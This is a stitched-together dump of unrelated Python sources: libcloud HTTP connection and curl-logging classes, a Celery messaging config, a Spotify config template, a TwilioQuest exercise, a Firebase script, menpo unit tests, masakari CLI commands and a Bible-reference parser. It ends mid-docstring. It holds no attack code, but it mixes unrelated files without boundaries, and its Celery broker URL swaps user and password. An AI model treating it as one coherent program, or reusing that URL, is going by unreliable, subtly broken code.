import httplib import urllib import time import hashlib import StringIO import ssl import os import socket import struct from pipes import quote as pquote import libcloud from libcloud.httplib_ssl import LibcloudHTTPSConnection from httplib import HTTPConnection as LibcloudHTTPConnection class RawResponse(object): def __init__(self, response=None): self._status = None self._response = None self._headers = {} self._error = None self._reason = None @property def response(self): if not self._response: self._response = self.connection.connection.getresponse() return self._response @property def status(self): if not self._status: self._status = self.response.status return self._status @property def headers(self): if not self._headers: self._headers = dict(self.response.getheaders()) return self._headers @property def reason(self): if not self._reason: self._reason = self.response.reason return self._reason class Response(object): """ A Base Response class to derive from. """ NODE_STATE_MAP = {} object = None body = None status = httplib.OK headers = {} error = None connection = None def __init__(self, response): self.body = response.read() self.status = response.status self.headers = dict(response.getheaders()) self.error = response.reason if not self.success(): raise Exception(self.parse_error()) self.object = self.parse_body() def parse_body(self): """ Parse response body. Override in a provider's subclass. @return: Parsed body. """ return self.body def parse_error(self): """ Parse the error messages. Override in a provider's subclass. @return: Parsed error. """ return self.body def success(self): """ Determine if our request was successful. The meaning of this can be arbitrary; did we receive OK status? Did the node get created? Were we authenticated? @return: C{True} or C{False} """ return self.status == httplib.OK or self.status == httplib.CREATED #TODO: Move this to a better location/package class LoggingConnection(): """ Debug class to log all HTTP(s) requests as they could be made with the C{curl} command. @cvar log: file-like object that logs entries are written to. """ log = None def _log_response(self, r): rv = "# -------- begin %d:%d response ----------\n" % (id(self), id(r)) ht = "" v = r.version if r.version == 10: v = "HTTP/1.0" if r.version == 11: v = "HTTP/1.1" ht += "%s %s %s\r\n" % (v, r.status, r.reason) body = r.read() for h in r.getheaders(): ht += "%s: %s\r\n" % (h[0].title(), h[1]) ht += "\r\n" # this is evil. laugh with me. ha arharhrhahahaha class fakesock: def __init__(self, s): self.s = s def makefile(self, mode, foo): return StringIO.StringIO(self.s) rr = r if r.chunked: ht += "%x\r\n" % (len(body)) ht += body ht += "\r\n0\r\n" else: ht += body rr = httplib.HTTPResponse(fakesock(ht), method=r._method, debuglevel=r.debuglevel) rr.begin() rv += ht rv += ("\n# -------- end %d:%d response ----------\n" % (id(self), id(r))) return (rr, rv) def _log_curl(self, method, url, body, headers): cmd = ["curl", "-i"] cmd.extend(["-X", pquote(method)]) for h in headers: cmd.extend(["-H", pquote("%s: %s" % (h, headers[h]))]) # TODO: in python 2.6, body can be a file-like object. 
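# --- Editor's note: an illustrative sketch (not from the libcloud sources) of the
# --- "override in a provider's subclass" pattern described in the Response docstrings
# --- above. It assumes the Response class and the httplib import from this module;
# --- the class name is hypothetical. It parses JSON bodies and treats any 2xx status
# --- as success.
import json

class ExampleProviderResponse(Response):
    def parse_body(self):
        # Parsed object is stored on self.object by Response.__init__
        return json.loads(self.body) if self.body else None

    def parse_error(self):
        return "Example provider error: %s" % self.body

    def success(self):
        return httplib.OK <= self.status < httplib.MULTIPLE_CHOICES  # 200..299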
if body is not None and len(body) > 0: cmd.extend(["--data-binary", pquote(body)]) cmd.extend([pquote("https://%s:%d%s" % (self.host, self.port, url))]) return " ".join(cmd) class LoggingHTTPSConnection(LoggingConnection, LibcloudHTTPSConnection): """ Utility Class for logging HTTPS connections """ def getresponse(self): r = LibcloudHTTPSConnection.getresponse(self) if self.log is not None: r, rv = self._log_response(r) self.log.write(rv + "\n") self.log.flush() return r def request(self, method, url, body=None, headers=None): headers.update({'X-LC-Request-ID': str(id(self))}) if self.log is not None: pre = "# -------- begin %d request ----------\n" % id(self) self.log.write(pre + self._log_curl(method, url, body, headers) + "\n") self.log.flush() return LibcloudHTTPSConnection.request(self, method, url, body, headers) class LoggingHTTPConnection(LoggingConnection, LibcloudHTTPConnection): """ Utility Class for logging HTTP connections """ def getresponse(self): r = LibcloudHTTPConnection.getresponse(self) if self.log is not None: r, rv = self._log_response(r) self.log.write(rv + "\n") self.log.flush() return r def request(self, method, url, body=None, headers=None): headers.update({'X-LC-Request-ID': str(id(self))}) if self.log is not None: pre = "# -------- begin %d request ----------\n" % id(self) self.log.write(pre + self._log_curl(method, url, body, headers) + "\n") self.log.flush() return LibcloudHTTPConnection.request(self, method, url, body, headers) class ConnectionKey(object): """ A Base Connection class to derive from. """ #conn_classes = (LoggingHTTPSConnection) conn_classes = (LibcloudHTTPConnection, LibcloudHTTPSConnection) responseCls = Response rawResponseCls = RawResponse connection = None host = '127.0.0.1' port = (80, 443) secure = 1 driver = None action = None def __init__(self, key, secure=True, host=None, force_port=None): """ Initialize `user_id` and `key`; set `secure` to an C{int} based on passed value. """ self.key = key self.secure = secure and 1 or 0 self.ua = [] if host: self.host = host if force_port: self.port = (force_port, force_port) def connect(self, host=None, port=None): """ Establish a connection with the API server. @type host: C{str} @param host: Optional host to override our default @type port: C{int} @param port: Optional port to override our default @returns: A connection """ host = host or self.host port = port or self.port[self.secure] kwargs = {'host': host, 'port': port} connection = self.conn_classes[self.secure](**kwargs) # You can uncoment this line, if you setup a reverse proxy server # which proxies to your endpoint, and lets you easily capture # connections in cleartext when you setup the proxy to do SSL # for you #connection = self.conn_classes[False]("127.0.0.1", 8080) self.connection = connection def _user_agent(self): return 'libcloud/%s (%s)%s' % ( libcloud.__version__, self.driver.name, "".join([" (%s)" % x for x in self.ua])) def user_agent_append(self, token): """ Append a token to a user agent string. Users of the library should call this to uniquely identify thier requests to a provider. @type token: C{str} @param token: Token to add to the user agent. """ self.ua.append(token) def request(self, action, params=None, data='', headers=None, method='GET', raw=False): """ Request a given `action`. Basically a wrapper around the connection object's `request` that does some helpful pre-processing. @type action: C{str} @param action: A path @type params: C{dict} @param params: Optional mapping of additional parameters to send. 
If None, leave as an empty C{dict}. @type data: C{unicode} @param data: A body of data to send with the request. @type headers: C{dict} @param headers: Extra headers to add to the request None, leave as an empty C{dict}. @type method: C{str} @param method: An HTTP method such as "GET" or "POST". @return: An instance of type I{responseCls} """ if params is None: params = {} if headers is None: headers = {} self.action = action self.method = method # Extend default parameters params = self.add_default_params(params) # Extend default headers headers = self.add_default_headers(headers) # We always send a content length and user-agent header headers.update({'User-Agent': self._user_agent()}) headers.update({'Host': self.host}) # Encode data if necessary if data != '' and data != None: data = self.encode_data(data) if data is not None: headers.update({'Content-Length': str(len(data))}) if params: url = '?'.join((action, urllib.urlencode(params))) else: url = action # Removed terrible hack...this a less-bad hack that doesn't execute a # request twice, but it's still a hack. self.connect() try: # @TODO: Should we just pass File object as body to request method # instead of dealing with splitting and sending the file ourselves? if raw: self.connection.putrequest(method, action) for key, value in headers.iteritems(): self.connection.putheader(key, value) self.connection.endheaders() else: self.connection.request(method=method, url=url, body=data, headers=headers) except ssl.SSLError, e: raise ssl.SSLError(str(e)) if raw: response = self.rawResponseCls() else: response = self.responseCls(self.connection.getresponse()) response.connection = self return response def add_default_params(self, params): """ Adds default parameters (such as API key, version, etc.) to the passed `params` Should return a dictionary. """ return params def add_default_headers(self, headers): """ Adds default headers (such as Authorization, X-Foo-Bar) to the passed `headers` Should return a dictionary. """ return headers def encode_data(self, data): """ Encode body data. Override in a provider's subclass. 
""" return data class ConnectionUserAndKey(ConnectionKey): """ Base connection which accepts a user_id and key """ user_id = None def __init__(self, user_id, key, secure=True, host=None, port=None): super(ConnectionUserAndKey, self).__init__(key, secure, host, port) self.user_id = user_id hello.py # -*- coding: utf8 -*- print('Hello world')withcouragetol/codebee-10l #!/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import absolute_import, unicode_literals from celery import platforms from celery import Celery '''mysql 连接池配置 ''' mysql = { 'pool_name': 'shadowX_pool', 'host': '', # 数据库地址 'port': 3306, 'user': 'root', 'password': '', 'database': 'celery', 'pool_resize_boundary': 50, 'enable_auto_resize': True, # 'max_pool_size': 10 } '''redis 连接配置 ''' redis = { 'host': '', # redis 地址 'port': 6379, 'user': 'root', 'password': '', 'db': 0, } '''rabbitmq 连接配置 ''' rabbit = { 'host': '', # RMQ地址 'port': 5672, 'user': 'guest', 'password': '', 'db': 0, } def get_celery(): """ Celery 配置信息 """ # rabbitmq 地址 BROKER = 'amqp://'+rabbit['password']+':'+rabbit['user']+'@'+rabbit['host']+':'+str(rabbit['port']) # redis 地址 BACKEND = 'redis://'+redis['host']+':'+str(redis['port'])+"/"+str(redis['db']) CELERY_ACCEPT_CONTENT = ['json'] CELERY_TASK_SERIALIZER = 'json' CELERY_RESULT_SERIALIZER = 'json' CELERY_ENABLE_UTC = False CELERY_TIMEZONE = 'Asia/Shanghai' platforms.C_FORCE_ROOT = True # 创建 celery celery = Celery('worker', broker=BROKER, backend=BACKEND) # 定义任务发现 celery.conf.CELERY_IMPORTS = ['task.all_task', # 'task.default.task_init', # 默认启动任务 'task.monitor.base', # 基础监控任务 'task.monitor.server', # 业务监控任务 'task.monitor.tpm' # 第三方组件监控任务 ] return celery, BROKER DATE_FORMATE = "%Y-%m-%d %H:%M:%S" # Copy this to config.py and update necessary values # Spotify Username username = "CHANGE_ME" # Spotify Authentication Scopes scope = "playlist-read-private playlist-modify-private playlist-modify-public" # Spotify Application Details client_id = "CHANGE_ME" client_secret = "CHANGE_ME" redirect_uri = "http://localhost:65000" # Genres on Beatport ("Arbitrary name": "URL path for genre") genres = { "All Genres": "", "140 / Deep Dubstep / Grime": "140-deep-dubstep-grime/95", "Afro House": "afro-house/89", "Bass / Club": "bass-club/85", "Bass House": "bass-house/91", "Breaks / Breakbeat / UK Bass": "breaks-breakbeat-uk-bass/9", "Dance / Electro Pop": "dance-electro-pop/39", "Deep House": "deep-house/12", "DJ Tools": "dj-tools/16", "Drum & Bass": "drum-bass/1", "Dubstep": "dubstep/18", "Electro (Classic / Detroit / Modern)": "electro-classic-detroit-modern/94", "Electronica": "electronica/3", "Funky / Groove / Jackin' House": "funky-groove-jackin-house/81", "Hard Dance / Hardcore": "hard-dance-hardcore/8", "Hard Techno": "hard-techno/2", "House": "house/5", "Indie Dance": "indie-dance/37", "Mainstage": "mainstage/96", "Melodic House & Techno": "melodic-house-techno/90", "Minimal / Deep Tech": "minimal-deep-tech/14", "Nu Disco / Disco": "nu-disco-disco/50", "Organic House / Downtempo": "organic-house-downtempo/93", "Progressive House": "progressive-house/15", "Psy-Trance": "psy-trance/13", "Tech House": "tech-house/11", "Techno (Peak Time / Driving)": "techno-peak-time-driving/6", "Techno (Raw / Deep / Hypnotic)": "techno-raw-deep-hypnotic/92", "Trance": "trance/7", "Trap / Wave": "trap-wave/38", "UK Garage / Bassline": "uk-garage-bassline/86" } # TwilioQuest version 3.1.26 # Works in: # 3.1.26 # bog standard main function def main(): print("functions") hail_friend() print("function arguments") 
hail_friend("Operator") print("function return values") print(f"{add_numbers(45, -1)}") # functions the tasks demand def add_numbers(num1, num2): return num1 + num2 def hail_friend(name=None): # use default value to pass Function challenge if (None == name): print("Hail, friend!") else: # use given value to pass argument challenge print(f"Hail, {name}!") # standard main guard if ("__main__" == __name__): main() SeanMabli/aiinpy0 import firebase_admin from firebase_admin import firestore from getadminkey import getadminkey adminkey = getadminkey() cred = firebase_admin.credentials.Certificate(adminkey) firebase_admin.initialize_app(cred) db = firestore.client() for doc in db.collection('documentation').stream(): if doc.to_dict()['version'] == '0.0.18': doc.reference.update({'equation' : 'y = x^2', 'equationderivative' : 'y = 2x', 'examples' : 'placeholder', 'graphx' : [], 'graphy' : [], 'parameters' : 'placeholder'}) fast_carpenter/data_import/_uproot3.py from typing import Any, Dict, List from ._base import DataImportBase class Uproot3DataImport(DataImportBase): """ This class is a wrapper around the uproot3 library. """ def __init__(self, config: Dict[str, Any]) -> None: super().__init__(config) def _process_config(self): pass def open(self, paths: List[str]) -> Any: """ This method is called by the importer to open the file. """ import uproot3 if len(paths) != 1: # TODO - support multiple paths raise AttributeError("Multiple paths not yet supported") # Try to open the tree - some machines have configured limitations # which prevent memmaps from begin created. Use a fallback - the # localsource option input_file = paths[0] try: rootfile = uproot3.open(input_file) except MemoryError: rootfile = uproot3.open(input_file, localsource=uproot3.FileSource.defaults) return rootfile yuxiang-zhou/menpo from collections import OrderedDict import numpy as np from nose.tools import assert_equal, raises from numpy.testing import assert_allclose from menpo.landmark import LandmarkGroup, LandmarkManager from menpo.shape import PointCloud from menpo.testing import is_same_array def test_LandmarkGroup_copy_true(): points = np.ones((10, 3)) mask_dict = OrderedDict([('all', np.ones(10, dtype=np.bool))]) pcloud = PointCloud(points, copy=False) lgroup = LandmarkGroup(pcloud, mask_dict) assert (not is_same_array(lgroup.lms.points, points)) assert (lgroup._labels_to_masks is not mask_dict) assert (lgroup.lms is not pcloud) def test_LandmarkGroup_copy_false(): points = np.ones((10, 3)) mask_dict = OrderedDict([('all', np.ones(10, dtype=np.bool))]) pcloud = PointCloud(points, copy=False) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) assert (is_same_array(lgroup._pointcloud.points, points)) assert (lgroup._labels_to_masks is mask_dict) assert (lgroup.lms is pcloud) def test_LandmarkManager_set_LandmarkGroup(): points = np.ones((10, 3)) mask_dict = OrderedDict([('all', np.ones(10, dtype=np.bool))]) pcloud = PointCloud(points, copy=False) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) man = LandmarkManager() man['test_set'] = lgroup assert (not is_same_array(man['test_set'].lms.points, lgroup.lms.points)) assert_allclose(man['test_set']['all'].points, np.ones([10, 3])) assert (man['test_set']._labels_to_masks is not lgroup._labels_to_masks) @raises(ValueError) def test_LandmarkManager_set_None_key(): pcloud = PointCloud(np.ones((10, 3)), copy=False) lgroup = LandmarkGroup.init_with_all_label(pcloud) man = LandmarkManager() man[None] = lgroup def test_LandmarkManager_set_pointcloud(): points = 
np.ones((10, 3)) pcloud = PointCloud(points, copy=False) man = LandmarkManager() man['test_set'] = pcloud lgroup = man['test_set'] assert (lgroup.lms is not pcloud) assert_allclose(lgroup._labels_to_masks['all'], np.ones(10, dtype=np.bool)) def test_landmarkgroup_copy_method(): points = np.ones((10, 3)) mask_dict = OrderedDict([('all', np.ones(10, dtype=np.bool))]) pcloud = PointCloud(points, copy=False) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) lgroup_copy = lgroup.copy() assert (not is_same_array(lgroup_copy.lms.points, lgroup.lms.points)) # Check the mask dictionary is deepcopied properly assert (lgroup._labels_to_masks is not lgroup_copy._labels_to_masks) masks = zip(lgroup_copy._labels_to_masks.values(), lgroup._labels_to_masks.values()) for ms in masks: assert (ms[0] is not ms[1]) def test_LandmarkManager_copy_method(): points = np.ones((10, 3)) pcloud = PointCloud(points, copy=False) man = LandmarkManager() man['test_set'] = pcloud man_copy = man.copy() assert (man_copy['test_set'] is not man['test_set']) assert (not is_same_array(man_copy['test_set'].lms.points, man['test_set'].lms.points)) def test_LandmarkManager_set_PointCloud_not_copy_target(): points = np.ones((10, 3)) pcloud = PointCloud(points, copy=False) man = LandmarkManager() man['test_set'] = pcloud assert (not is_same_array(man['test_set'].lms.points, pcloud.points)) assert_allclose(man['test_set']['all'].points, np.ones([10, 3])) def test_LandmarkManager_iterate(): points = np.ones((10, 3)) pcloud = PointCloud(points, copy=False) target = PointCloud(points) man = LandmarkManager() man['test_set'] = pcloud for l in man: assert_equal(l, 'test_set') def test_LandmarkGroup_iterate(): points = np.ones((10, 3)) mask_dict = OrderedDict([('all', np.ones(10, dtype=np.bool))]) pcloud = PointCloud(points, copy=False) target = PointCloud(points) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) for l in lgroup: assert_equal(l, 'all') def test_LandmarkManager_get(): points = np.ones((10, 3)) pcloud = PointCloud(points, copy=False) mask_dict = OrderedDict([('all', np.ones(10, dtype=np.bool))]) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) man = LandmarkManager() man._landmark_groups['test_set'] = lgroup assert(man['test_set'] is lgroup) def test_LandmarkManager_set(): points = np.ones((10, 3)) pcloud = PointCloud(points, copy=False) mask_dict = OrderedDict([('all', np.ones(10, dtype=np.bool))]) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) man = LandmarkManager() man['test_set'] = lgroup assert_allclose(man._landmark_groups['test_set'].lms.points, lgroup.lms.points) assert_equal(man._landmark_groups['test_set'].n_labels, 1) def test_LandmarkManager_del(): points = np.ones((10, 3)) pcloud = PointCloud(points, copy=False) target = PointCloud(points) man = LandmarkManager() man['test_set'] = pcloud del man['test_set'] assert_equal(man.n_groups, 0) def test_LandmarkManager_in(): points = np.ones((10, 3)) pcloud = PointCloud(points, copy=False) man = LandmarkManager() man['test_set'] = pcloud assert ('test_set' in man) def test_LandmarkGroup_get(): points = np.ones((3, 2)) pcloud = PointCloud(points, copy=False) mask_dict = OrderedDict( [('lower', np.array([1, 1, 0], dtype=np.bool)), ('upper', np.array([0, 0, 1], dtype=np.bool))]) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) assert_allclose(lgroup['lower'].n_points, 2) assert_allclose(lgroup['upper'].n_points, 1) def test_LandmarkGroup_in(): points = np.ones((3, 2)) pcloud = PointCloud(points, copy=False) mask_dict = OrderedDict([('all', 
np.ones(3, dtype=np.bool))]) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) assert ('all' in lgroup) def test_LandmarkGroup_set(): points = np.array([[0, 1], [2, 3], [4, 5]]) pcloud = PointCloud(points, copy=False) mask_dict = OrderedDict([('all', np.ones(3, dtype=np.bool))]) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) lgroup['lower'] = [0, 1] assert_allclose(lgroup['lower'].n_points, 2) assert_allclose(lgroup['lower'].points[0, :], [0, 1]) assert_allclose(lgroup['lower'].points[1, :], [2, 3]) def test_LandmarkGroup_set_ordered_labels(): points = np.array([[0, 1], [2, 3], [4, 5]]) pcloud = PointCloud(points, copy=False) mask_dict = OrderedDict([('all', np.ones(3, dtype=np.bool))]) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) lgroup['lower'] = [0, 1] assert_allclose(lgroup['lower'].n_points, 2) assert_allclose(lgroup['lower'].points[0, :], [0, 1]) assert_allclose(lgroup['lower'].points[1, :], [2, 3]) def test_LandmarkGroup_del(): points = np.array([[0, 1], [2, 3], [4, 5]]) pcloud = PointCloud(points, copy=False) mask_dict = OrderedDict([('all', np.ones(3, dtype=np.bool)), ('lower', np.array([1, 1, 0], dtype=np.bool))]) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) del lgroup['lower'] assert ('all' in lgroup) assert ('lower' not in lgroup) @raises(ValueError) def test_LandmarkGroup_del_unlabelled(): points = np.array([[0, 1], [2, 3], [4, 5]]) pcloud = PointCloud(points, copy=False) mask_dict = OrderedDict([('all', np.ones(3, dtype=np.bool)), ('lower', np.array([1, 1, 0], dtype=np.bool))]) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) del lgroup['all'] @raises(ValueError) def test_LandmarkGroup_create_unlabelled(): points = np.array([[0, 1], [2, 3], [4, 5]]) pcloud = PointCloud(points, copy=False) mask_dict = OrderedDict([('all', np.zeros(3, dtype=np.bool))]) LandmarkGroup(pcloud, mask_dict, copy=False) @raises(ValueError) def test_LandmarkGroup_pass_non_ordered_dict(): points = np.array([[0, 1], [2, 3], [4, 5]]) pcloud = PointCloud(points, copy=False) mask_dict = {'all': np.ones(3, dtype=np.bool)} LandmarkGroup(pcloud, mask_dict, copy=False) @raises(ValueError) def test_LandmarkGroup_create_no_mask(): points = np.array([[0, 1], [2, 3], [4, 5]]) pcloud = PointCloud(points, copy=False) LandmarkGroup(pcloud, None, copy=False) @raises(ValueError) def test_LandmarkGroup_create_incorrect_shape(): points = np.array([[0, 1], [2, 3], [4, 5]]) pcloud = PointCloud(points, copy=False) mask_dict = OrderedDict(['all', np.ones(5, dtype=np.bool)]) LandmarkGroup(pcloud, mask_dict, copy=False) def test_LandmarkGroup_with_labels(): points = np.array([[0, 1], [2, 3], [4, 5]]) pcloud = PointCloud(points, copy=False) mask_dict = OrderedDict([('lower', np.array([1, 1, 0], dtype=np.bool)), ('upper', np.array([0, 0, 1], dtype=np.bool))]) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) new_lgroup = lgroup.with_labels('lower') assert_equal(new_lgroup.n_labels, 1) assert_equal(new_lgroup.n_landmarks, 2) assert ('lower' in new_lgroup) new_lgroup = lgroup.with_labels(['lower']) assert_equal(new_lgroup.n_labels, 1) assert_equal(new_lgroup.n_landmarks, 2) assert ('lower' in new_lgroup) def test_LandmarkGroup_without_labels(): points = np.array([[0, 1], [2, 3], [4, 5]]) pcloud = PointCloud(points, copy=False) mask_dict = OrderedDict([('lower', np.array([1, 1, 0], dtype=np.bool)), ('upper', np.array([0, 0, 1], dtype=np.bool))]) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) new_lgroup = lgroup.without_labels('upper') assert_equal(new_lgroup.n_labels, 1) 
assert_equal(new_lgroup.n_landmarks, 2) assert ('lower' in new_lgroup) new_lgroup = lgroup.without_labels(['upper']) assert_equal(new_lgroup.n_labels, 1) assert_equal(new_lgroup.n_landmarks, 2) assert ('lower' in new_lgroup) def test_LandmarkManager_str(): points = np.ones((10, 3)) pcloud = PointCloud(points, copy=False) man = LandmarkManager() man['test_set'] = pcloud out_str = man.__str__() assert (len(out_str) > 0) def test_LandmarkGroup_str(): points = np.array([[0, 1], [2, 3], [4, 5]]) pcloud = PointCloud(points, copy=False) mask_dict = OrderedDict([('all', np.ones(3, dtype=np.bool))]) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) out_str = lgroup.__str__() assert (len(out_str) > 0) def test_LandmarkGroup_get_None(): points = np.ones((10, 3)) pcloud = PointCloud(points, copy=False) mask_dict = OrderedDict([('all', np.ones(10, dtype=np.bool))]) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) assert lgroup[None] is not pcloud assert_allclose(lgroup[None].points, pcloud.points) def test_LandmarkGroup_create_with_all_label(): points = np.ones((10, 3)) pcloud = PointCloud(points, copy=False) lgroup = LandmarkGroup.init_with_all_label(pcloud, copy=False) assert lgroup.n_labels == 1 assert 'all' in lgroup def test_LandmarkGroup_has_nan_values(): points = np.ones((10, 3)) points[0, 0] = np.nan pcloud = PointCloud(points, copy=False) lgroup = LandmarkGroup.init_with_all_label(pcloud, copy=False) assert lgroup.has_nan_values() 1-10 # Copyright(c) 2016 Nippon Telegraph and Telephone Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from openstack import exceptions as sdk_exc from osc_lib.command import command from osc_lib import exceptions from osc_lib import utils from oslo_serialization import jsonutils from masakariclient import api_versions from masakariclient.common.i18n import _ import masakariclient.common.utils as masakariclient_utils class ListNotification(command.Lister): """List notifications.""" def get_parser(self, prog_name): parser = super(ListNotification, self).get_parser(prog_name) parser.add_argument( '--limit', metavar='', help=_('Limit the number of notifications returned') ) parser.add_argument( '--marker', metavar='', help=_('Only return notifications that appear after the given ' 'notification ID') ) parser.add_argument( '--sort', metavar='[:]', help=_("Sorting option which is a string containing a list of " "keys separated by commas. Each key can be optionally " "appended by a sort direction (:asc or :desc). The valid " "sort keys are: ['type', 'created_at', 'updated_at']") ) parser.add_argument( '--filters', metavar='<"key1=value1;key2=value2...">', help=_("Filter parameters to apply on returned notifications. " "This can be specified multiple times, or once with " "parameters separated by a semicolon. 
The valid filter " "keys are: ['source_host_uuid', 'type', 'status', " "generated-since]"), action='append' ) return parser def take_action(self, parsed_args): masakari_client = self.app.client_manager.ha columns = ['notification_uuid', 'generated_time', 'status', 'type', 'source_host_uuid', 'payload'] queries = masakariclient_utils.format_sort_filter_params(parsed_args) notifications = masakari_client.notifications(**queries) formatters = {} return ( columns, (utils.get_item_properties(p, columns, formatters=formatters) for p in notifications) ) class ShowNotification(command.ShowOne): """Show notification details.""" def get_parser(self, prog_name): parser = super(ShowNotification, self).get_parser(prog_name) parser.add_argument( 'notification', metavar='', help='UUID of notification to display', ) return parser def take_action(self, parsed_args): masakari_client = self.app.client_manager.ha return _show_notification(masakari_client, notification_uuid=parsed_args.notification) class CreateNotification(command.ShowOne): """Create notification.""" def get_parser(self, prog_name): parser = super(CreateNotification, self).get_parser(prog_name) parser.add_argument( 'type', metavar='', choices=['COMPUTE_HOST', 'VM', 'PROCESS'], help=_('Type of failure. The supported options are: ' 'COMPUTE_HOST, VM, PROCESS.') ) parser.add_argument( 'hostname', metavar='', help=_('Hostname of notification.') ) parser.add_argument( 'generated_time', metavar='', help=_('Timestamp for notification. e.g. 2016-01-01T01:00:00.000') ) parser.add_argument( 'payload', metavar='', help=_('JSON string about failure event.') ) return parser def take_action(self, parsed_args): masakari_client = self.app.client_manager.ha payload = jsonutils.loads(parsed_args.payload) attrs = { 'type': parsed_args.type, 'hostname': parsed_args.hostname, 'generated_time': parsed_args.generated_time, 'payload': payload, } notification = masakari_client.create_notification(**attrs) return _show_notification(masakari_client, notification.notification_uuid) def _show_notification(masakari_client, notification_uuid): try: notification = masakari_client.get_notification(notification_uuid) except sdk_exc.ResourceNotFound: raise exceptions.CommandError(_('Notification not found: %s' ) % notification_uuid) formatters = {} columns = [ 'created_at', 'updated_at', 'notification_uuid', 'type', 'status', 'source_host_uuid', 'generated_time', 'payload' ] if masakari_client.default_microversion: api_version = api_versions.APIVersion( masakari_client.default_microversion) if api_version >= api_versions.APIVersion("1.1"): columns.append('recovery_workflow_details') return columns, utils.get_dict_properties(notification.to_dict(), columns, formatters=formatters) # encoding=utf-8 import re RE_BOOK = re.compile(r""" ((\d\s)?[А-Я][а-я]+)\.?\s* # book short title (,\s*\d+\s*зач\.\s*(\([^\)]+\))?)?,?\s* # text before chapter ([IVXL]+)[^А-Яа-я\.\<\>\(\)]+[.;,]? # chapter with lines """, re.VERBOSE) # using [^IVXL] due to possibility of unknown unicode range symbol RE_CHAPTER = re.compile(r""" ((([IVXL]+),\s*([^IVXL]+)([IVXL]+),\s*(.+)) # type 1: chapter's range | ([IVXL]+),([^\<\>\(\)]+)) # type 2: chapter lines """, re.VERBOSE) # using . 
instead of - due to possibility of unknown unicode range symbol RE_CHAPTER_LINE_RANGE = re.compile(r"(\d+)\s*.\s*(\d+)") RE_LINE_INT = re.compile(r"(\d+)") def rim2arab(num): """Convert Latin numbers to Arabic: L - 50 X - 10 V - 5 I - 1 :type num: str :rtype: int """ res = 0 lt = False ltx = False for c in num: if c == "L": if ltx: res += 30 else: res += 50 lt = False ltx = False elif c == "X": if lt: res += 8 else: res += 10 lt = False ltx = True elif c == "V": if lt: res += 3 else: res += 5 lt = False ltx = False elif c == "I": res += 1 lt = True ltx = False return res class RefBook: """Each bible book must have book short title and one or set of chapters. Each chapter is presented by sequence of lines: VII, 1-3, 5-8, 9, 10 Book instance chapters are list of dict like: {"chapter__num": int, "num__gte": int, "num__lte": int} which can be used directly in Django model's filters """ def __init__(self, book, chapters=None): self.book = book self.chapters = chapters or [] self.chapters_query = None def __str__(self): return "book={}, chapters={}".format(self.book, self.chapters) def __eq__(self, other): if isinstance(other, RefBook): res = (self.book == other.book and len(self.chapters) == len(other.chapters)) if res: for i, ch in enumerate(self.chapters): res = res and ch == other.chapters[i] if not res: break return res return False def __parse_lines(self, chapter, lines, range_start=False, range_end=False): """Parsing sequence of lines numbers separated by ','. It can be single lines (int) or ranges (int - int). For chapter's range: If chapter's range start line sequence ends with single line all lines greater then this line should be taken. If chapter's range end line sequence starts with single line all lines less then this line should be taken. :range_start: should be num__gte :range_end: should be num__lte """ _arr = lines.split(",") _arr_len = len(_arr) _num_postfix = "" if range_start: _num_postfix = "__gte" elif range_end: _num_postfix = "__lte" for i, lq in enumerate(_arr): _lines = lq.replace(".", "").strip() if not _lines: continue _m = RE_CHAPTER_LINE_RANGE.match(_lines) if _m: # line is a range: ls = _m.group(1) le = _m.group(2) self.chapters.append( { "chapter__num": chapter, "num__gte": int(ls), "num__lte": int(le) } ) else: # line is a single int: _m = RE_LINE_INT.search(_lines) if _m: ln = int(_m.group(1)) _num = "num" if _num_postfix: if (i == _arr_len - 1 and range_start or i == 0 and range_end): _num += _num_postfix _num_postfix = "" self.chapters.append( {"chapter__num": chapter, _num: ln} ) else: print("[ERROR]: Can't parse chapter lines: {}" .format(_lines)) continue def parse_chapters(self, line): """Chapters are presented by sequence of latin numbers with line sequences separated by ';'. To keep spaces for endpos calculating chapter pattern should not be stripped. 
""" self.chapters_query = line endpos = line.count(";") for chapter in line.split(";"): if not chapter.strip(): continue m = RE_CHAPTER.search(chapter) if not m: continue endpos += m.end() _parsed = m.groups() if _parsed[-1]: # type 2: ch = rim2arab(_parsed[-2]) self.__parse_lines(ch, _parsed[-1]) else: # type 1: ch1, _lines1, ch2, _lines2 = _parsed[2:6] arab_ch1 = rim2arab(ch1) arab_ch2 = rim2arab(ch2) self.__parse_lines(arab_ch1, _lines1, range_start=True) for ch in range(arab_ch1+1, arab_ch2): self.chapters.append({"chapter__num": ch}) self.__parse_lines(arab_ch2, _lines2, range_end=True) return endpos class MatchBook: def __init__(self, line, start=0, endpos=0, book=None): self.line = line self.start = start self.endpos = endpos self.book = book def __str__(self): return "span=({}:{}), {}".format(self.start, self.endpos, self.book) def __eq__(self, other): if isinstance(other, MatchBook): return (self.start == other.start and self.endpos == other.endpos and self.book == other.book) return False @property def match(self): return self.line[self.start:self.endpos] class RefParser: """Parse Bible reference patterns into a list of MatchBooks """ def __init__(self, line=None): self.refs = [] if line: self.parse(line) def parse(self, line): for m in RE_BOOK.finditer(line): _line = line[m.start():m.end()] # cutting prefix text: _start = _line.index(m.group(5)) book = RefBook(m.group(1)) endpos = m.start() + _start + book.parse_chapters(_line[_start:m.end()]) if book.chapters: self.refs.append( MatchBook(line, start=m.start(), endpos=endpos, book=book) ) """Cambridge Communications 